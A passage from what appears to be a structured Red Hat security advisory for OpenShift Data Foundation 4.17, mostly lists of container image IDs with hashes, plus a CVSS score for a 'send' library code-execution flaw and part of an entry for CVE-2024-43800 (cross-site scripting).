"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", ], }, ], scores: [ { cvss_v3: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "LOW", baseScore: 5, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L", version: "3.1", }, products: [ "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "send: Code Execution Vulnerability in Send Library", }, { cve: "CVE-2024-43800", cwe: { id: "CWE-79", name: "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", }, discovery_date: "2024-09-10T15:30:33.631718+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", 